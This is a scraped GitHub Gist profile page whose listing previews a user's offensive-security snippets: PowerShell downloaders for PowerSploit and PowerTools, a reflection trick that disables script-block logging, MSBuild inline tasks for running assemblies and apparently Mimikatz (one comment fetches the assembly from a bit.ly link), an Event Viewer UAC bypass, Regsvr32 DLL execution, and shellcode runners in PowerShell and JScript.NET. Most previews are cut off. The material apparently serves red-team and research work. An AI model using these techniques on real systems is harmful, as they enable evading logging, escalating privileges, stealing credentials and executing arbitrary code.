Skip to content

Instantly share code, notes, and snippets.

Dave Hardy davehardy20

  • UK
Block or report user

Report or block davehardy20

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View powertools-downloader.ps1
Remove-Module PowerView -ErrorAction SilentlyContinue
Remove-Module PowerUp -ErrorAction SilentlyContinue
$webclient = New-Object System.Net.WebClient
$url = "https://github.com/Veil-Framework/PowerTools/archive/master.zip"
$file = "$($env:TEMP)\PowerTools.zip"
$webclient.DownloadFile($url,$file)
#Unblock-File -Path $file
$targetondisk = "$([System.Environment]::GetFolderPath('MyDocuments'))\WindowsPowerShell\Modules"
New-Item -ItemType Directory -Force -Path $targetondisk | out-null
$shell_app=new-object -com shell.application
View powersploit-downloader.ps1
Remove-Module PowerSploit -ErrorAction SilentlyContinue
$webclient = New-Object System.Net.WebClient
$url = "https://github.com/mattifestation/PowerSploit/archive/master.zip"
$file = "$($env:TEMP)\PowerSploit.zip"
$webclient.DownloadFile($url,$file)
#Unblock-File -Path $file
$targetondisk = "$([System.Environment]::GetFolderPath('MyDocuments'))\WindowsPowerShell\Modules"
New-Item -ItemType Directory -Force -Path $targetondisk | out-null
$shell_app=new-object -com shell.application
$zip_file = $shell_app.namespace($file)
@davehardy20
davehardy20 / keybase.md
Created Jun 24, 2017
Android created Gist
View keybase.md

Keybase proof

I hereby claim:

  • I am davehardy20 on github.
  • I am davehardy20 (https://keybase.io/davehardy20) on keybase.
  • I have a public key ASCgZJlcOaliMj7vAQc2qT6UoN5TfANsZY9TzAg2WSAoLgo

To claim this, I am signing this object:

View bypass.xml
<?xml version="1.0"?>
<command>
<![CDATA[
function Invoke-WMIObfuscatedPSCommand
function invoke-bypass
{
$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetField"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
@davehardy20
davehardy20 / msbuilder.xml
Created Jul 27, 2017
MSBuild Execute Assembly From Environment Variable
View msbuilder.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuilder.xml -->
<!-- Populate the Env Var like this or many other ways: -->
<!-- $env:TheThingIs = (New-Object Net.Webclient).downloadstring('http://bit.ly/2tDkg2e') -->
<!-- This has the advantage of keeping the assembly out of the xml on disk if it were ever recovered -->
<!-- This is just a simple example... MSBuild is a rich scripting engine with lots of abiltiy to customize the build process -->
<Target Name="Hello">
<SharpLauncher >
</SharpLauncher>
@davehardy20
davehardy20 / EventVwrBypass.cs
Created Jul 27, 2017
Event Viewer UAC Bypass in CSharp for use with InstallUtil.exe
View EventVwrBypass.cs
using System;
using System.Linq;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using Microsoft.Win32;
/*
InstallUtil.exe C# version of Event Viewer UAC bypass
@davehardy20
davehardy20 / katz.xml
Created Jul 27, 2017
MSBuild - Mimikatz - Server 2016
View katz.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.xml -->
<Target Name="Hello">
<SharpLauncher >
</SharpLauncher>
</Target>
<UsingTask
TaskName="SharpLauncher"
TaskFactory="CodeTaskFactory"
@davehardy20
davehardy20 / PoCPowerShellCoreShellcodeRunner.ps1
Created Jul 27, 2017
A simple PoC shellcode runner that works in PowerShell Core on Nano Server and demonstrates how to call Win32 APIs
View PoCPowerShellCoreShellcodeRunner.ps1
<#
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
#>
function Invoke-VirtualAlloc {
Param (
[IntPtr] $lpAddress,
[UInt32] $dwSize,
[UInt32] $flAllocationType,
@davehardy20
davehardy20 / evil.cs
Created Jul 27, 2017
Execute a DLL via Regsvr32
View evil.cs
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;
namespace Export
{
class Test
{
@davehardy20
davehardy20 / shellcode.js
Created Jul 27, 2017
Execute ShellCode Via Jscript.NET
View shellcode.js
import System;
import System.Runtime.InteropServices;
import System.Reflection;
import System.Reflection.Emit;
import System.Runtime;
import System.Text;
//C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe Shellcode.js
//C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Shellcode.js
You can’t perform that action at this time.